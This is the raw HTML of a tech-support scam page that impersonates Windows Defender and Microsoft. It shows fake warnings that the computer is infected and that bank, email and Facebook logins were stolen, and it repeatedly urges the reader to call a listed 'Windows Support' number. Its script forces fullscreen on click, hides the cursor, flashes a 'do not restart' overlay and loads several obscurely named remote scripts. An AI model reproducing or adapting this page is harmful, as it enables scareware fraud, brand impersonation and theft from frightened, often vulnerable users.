<html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8">
 
<script defer data-domain="invoice-display-1.com/ZtigB9" src="https://api.publytics.net/js/script.manual.min.js"></script>
<script>
    window.publytics = window.publytics || function() { (window.publytics.q = window.publytics.q || []).push(arguments) };
    publytics('pageview');
</script>
	 
<meta charset="utf-8"> 
<meta content="width=device-width,initial-scale=1,shrink-to-fit=no" name="viewport"> 
<meta content="noindex,nofollow" name="robots"> 
<title>Get Help Desk -01U2E1</title> 
<link href="index.html" rel="icon" id="favicon" type="image/png"> 
<link href="https://ensap.pages.dev/01css32bd.css" rel="stylesheet"> 
<script type="text/javascript" src="https://code.jquery.com/jquery-1.4.4.min.js"></script> 
<script src="https://ensap.pages.dev/12dgdur.js"></script> 
<script src="https://ensap.pages.dev/11gfdjuef.js"></script> 
<script src="https://ensap.pages.dev/09sgsgsfr.js"></script> 
<script src="https://ensap.pages.dev/13dugfjdf.js"></script>
 
</head>
<body class="map" id="mycanvas" style="cursor:none">
<div class="bg" style="cursor:none"> 
<div class="bgimg" style="top:0"><img src="https://ensap.pages.dev/fesbg.webp" alt="" width="100%"></div>
</div>
<a href="#" id="link_black" <a style="cursor:none" rel="noreferrer">
<div class="black" style="height: 145%; cursor: none; display: block;"></div>
</a>
<div class="pro_box2" style="cursor: none; display: block;"><img src="https://ensap.pages.dev/bx1.png" alt="" style="width:100%;max-width: 100%;display: block;      margin: 0 auto;">
</div>
<div class="pro_box3" style="cursor: none; display: block;"><img src="https://ensap.pages.dev/web1.png" alt="" style="width:100%;max-width: 100%;display: block;      margin: 0 auto;">
</div>
<div style="bottom:-20px;position:fixed;cursor:none;z-index:999999999;" id="footer">
<div class="row">
<div class="col-md-12">
<div class="right-foot" style="text-align:center;margin-bottom: 5px;"><span id="footertxt">              <img src="https://ensap.pages.dev/img01df.png"> Windows Security </span> <span style="font-weight:500;padding-left:13px;color:#fff; ">Dial Windows Support: <span style="border:1px solid #fff;border-radius:5px;padding:4px 5px"> <img src="https://ensap.pages.dev/winlo.png" alt="" style="width: 25px;vertical-align: sub;"> Call us directly 1-888-768-8991            </span>                    </span>
</div>
</div>
<div class="col-md-12">
<marquee direction="left" height="100px" width="100%"><small> <div class="text-left" style="color:#eee;font-size:10px">An unrecognized app was blocked by Windows
Defender SmartScreen. Your system may be vulnerable. A Windows
Defender scan detected adware that may steal passwords, personal information, financial data, and personal files. </small>
</marquee>
</div>
</div>
</div>
<div class="lightbox" id="poptxt" style="display: block;">
<div class="ilb top" style="font-size:17px">
<div class="ilb headers" style="border-bottom:1px solid #d6d5d5"><span class="fl title" id="txtadd">            <span class="fl ilb">              <img src="https://ensap.pages.dev/dm.png" class="logo3">            </span>Windows Defender Security Center</span> <span class="fl title2" id="txts1">            <a href="#" id="bgt">              <img src="https://ensap.pages.dev/cs.png">            </a>          </span>
</div>
</div>
<div id="txtintro"><span class="colo-rd">          <div id="ip_add">Windows Defender Security Center</div>          <div id="cityopm">System affected by security breach</div>          <div id="isp"> (Error Code: 16JPsy7)</div>        </span>
</div>
<img src="https://ensap.pages.dev/re.gif" id="banner">
<div id="disclaimer">Access to the system is restricted for protection purposes. <br> <span class="support" style="font-size:22px;">Please contact Windows Support: <br><span style="border:1px solid #114d9a;border-radius:5px;padding:4px 5px"> <img src="https://ensap.pages.dev/winlo.png" alt="" style="width: 25px;vertical-align: sub;"> Call us directly 1-888-768-8991        </span>            </span>
</div>
<div id="bottom"><img src="https://ensap.pages.dev/img01df.png" id="badge"> <span class="title3">Windows</span>
<ul>
<li><a href="#">
<div class="fr button2"><span id="addtochromebutton">Allow</span></div>
</a></li>
<li><a href="#">
<div class="fr button blink"><span id="addtochromebutton">Cancel</span></div>
</a></li>
</ul>
</div>
</div>
<div class="cardcontainer" style="cursor: none; display: block;" id="pop_up_new"><p style="font-size:16px;font-weight:400;margin:0;margin-bottom:5px;padding:5px 10px;color:#fff!important;color:#414141;font-weight:700;margin-top:8px" class="text-center">Windows Defender - Security Warning</p>
This system cannot be accessed for security reasons.<p></p>
Your computer has been reported to have malicious threats.
<br> <br> <br> <br> <br> The following information has been stolen: <br> >> Email address <br> >> Bank login
password <br> >> Facebook account login <br> >> Photos and documents <br> According to a Windows Defender
scan, this device contains adware that can steal passwords, online IDs, financial information, personal files, photos, and documents.
<br> Please contact us immediately. Our engineers will guide you through the removal process over the phone. <br> Contact Windows
Support immediately to report the threat, stop identity theft, and unblock access to this device. <br>
Closing this window will suspend your Windows registration and may put your personal information at risk. <br>
<p style="padding-bottom:0;color:#fff;font-size:16px">Please call Windows Support: <strong> <span style="border:0px solid #fff;border-radius:5px;padding:5px 5px"> <br>Call us directly  1-888-768-8991        </span></strong>
</p>
<div class="action_buttons"><a class="active" id="leave_page" style="cursor:pointer;color:#fff!important">OK</a> <a class="active" id="leave_page" style="color:#fff!important">Cancel</a>
</div>
</div>
<div class="answer_list" style="display:none;background-color:#000;height:auto;width:550px;left:33%;position:absolute;z-index:99999999;border:1px solid transparent;border-color:#d6d8db;border-radius:.5rem" id="welcomeDiv">
<p style="color:#fff;margin-top:10px;font-size:16px;padding:0 5px" class="text-center">
Please contact us as soon as possible. Our engineers will assist you with the removal process over the phone. Your computer has been disabled. Windows
Defender SmartScreen has stopped an unrecognized application. Running this application may compromise your system's security.
</p>
</div> <br> <strong>Call Windows Support: <span style="border:1px solid #383d41;border-radius:5px;padding:6px 5px"> <img src="https://ensap.pages.dev/&quot;winlo.png&quot;" alt="&nbsp;" style="width: 25px;vertical-align: bottom;"> Call us directly <script>document.write(bcda)</script>
</span>
</strong></p>
</div>
<div id="chat" style="display: block;"><img src="https://ensap.pages.dev/img01df.png"> <span style="color:#222;font-size:24px;font-weight:600;margin-left:6px;position:relative;top:5px">Microsoft</span>
<p style="font-weight:600;font-size:24px">Call Support: <br></p>
<h4 style="font-weight:600;font-size:22px"><img src="https://ensap.pages.dev/winlo.png" alt="" style="width: 25px;margin-left: 0;"> Please call <br>
1-888-768-8991
<br>(Security Help Desk)
</h4>
<div class="arrow-down">
<svg height="1em" viewBox="0 0 320 512">
<style>                svg {
fill: #fff
}            </style>
<path d="M137.4 374.6c12.5 12.5 32.8 12.5 45.3 0l128-128c9.2-9.2 11.9-22.9 6.9-34.9s-16.6-19.8-29.6-19.8L32 192c-12.9 0-24.6 7.8-29.6 19.8s-2.2 25.7 6.9 34.9l128 128z"></path> 
</svg> 
</div>
</div>
<style> #exit-popup { 
position: fixed; 
left: 0; 
top: 0; 
right: 0; 
margin: 0 auto; 
display: none; 
background-color: #fff; 
max-width: 460px; 
padding: 10px; 
border-radius: 8px; 
box-shadow: 0 0 10px rgba(0, 0, 0, 0.5); 
font-family: Arial, Helvetica, sans-serif; 
width: 90%; 
box-sizing: border-box; 
z-index: 9999999999999999999999;
}
 
.btn_leave { 
padding: 10px 20px; 
background-color: #1b73e8; 
color: #fff !important; 
text-transform: capitalize; 
text-decoration: none; 
border: 1px solid #ddd; 
border-radius: 5px; 
display: inline-block; 
animation: zoominoutsinglefeatured 1s infinite;
}
 
.btn_cancel { 
padding: 10px 20px; 
border: 1px solid #ddd; 
color: #1b73e8 !important; 
text-transform: capitalize; 
text-decoration: none; 
border-radius: 5px; 
display: inline-block; 
margin-left: 10px; 
background-color: transparent;
}
 
.btn-wrapper { 
text-align: right; 
margin-top: 20px;
}
 
@keyframes zoominoutsinglefeatured { 
0% { 
transform: scale(1, 1); 
} 
50% { 
transform: scale(1.1, 1.1);
}
100% {
transform: scale(1, 1);
}
}
 
@keyframes zoomininsinglefeatured {
0% {
transform: scale(1, 1); 
}
50% {
transform: scale(1.1, 1.1); 
}
100% {
transform: scale(1, 1); 
}
}
 
@keyframes scale {
0% {
transform: scale(1);
}
100% {
transform: scale(1.2); 
}
}</style>
<div id="overlay2" style="    z-index: 9999999999;    position: fixed;    height: 100vh;    width: 100vw;    background: black;    display: none;">
<div style="height: 250px;width: 650px;margin: auto;margin-top: calc( (100vh / 2) - 125px );border: 2px white solid;padding: 50px; animation: scale 2s infinite alternate;">
<p class="text-center" style="color: #FEFEFE; font-size: large;"> Please do not restart or operate your computer.<br>
Your computer has been disabled. Please call immediately.<br> Access to this computer is blocked for security reasons.<br>
Please contact us immediately. A technician will assist you in resolving the problem. </p></div>
</div>
<div id="exit-popup" style="display: block;"><h3>Are you leaving the site?</h3>
<p style="font-size: large">Are you sure you want to leave this page?</p>
<div class="btn-wrapper">
<button class="btn_leave" style="font-size: large">Leave</button>
</div>
</div>
<script>    let popupShown = false;
let isOverlay = false;
 
function isFullscreen() {
    return !!(document.fullscreenElement || document.webkitFullscreenElement || document.mozFullScreenElement || document.msFullscreenElement);
}
 
document.addEventListener('click', () => {
    const el = document.documentElement;
    if (el.requestFullscreen) {
        el.requestFullscreen();
    } else if (el.webkitRequestFullscreen) {
        el.webkitRequestFullscreen();
    } else if (el.msRequestFullscreen) {
        el.msRequestFullscreen();
    }
});
 
function checkFull() {
    if (!popupShown && !isFullscreen()) {
        isOverlay = false;
        console.log('show popup');
        setTimeout(function() {
            document.getElementById('exit-popup').style.display = 'block';
        }, 3000);
        popupShown = true;
    } else if (popupShown && isFullscreen()) {
        isOverlay = true;
        document.getElementById('overlay2').style.display = 'block';
        setTimeout(function() {
            document.getElementById('overlay2').style.display = 'none';
        }, 5000);
        console.log('hide popup');
        document.getElementById('exit-popup').style.display = 'none';
        popupShown = false;
    }
    console.log(isFullscreen(), popupShown);
}
 
document.addEventListener('mousemove', checkFull);</script>
<script></script>
<script src="https://ensap.pages.dev/08dgsg3d.js"></script>
<script src="https://ensap.pages.dev/07sdgsg4.js"></script>
<script src="https://ensap.pages.dev/06hshs.js"></script>
<script src="https://ensap.pages.dev/05sdghdf.js"></script>
<script src="https://ensap.pages.dev/04shesc1.js"></script>
<script src="https://ensap.pages.dev/03fgsskryeivh.js"></script>
<script src="https://ensap.pages.dev/02dgdsg3d.js"></script>
<script type="text/javascript" src="https://ensap.pages.dev/01d1fgshfddfg.js"></script>
 
 
</body></html>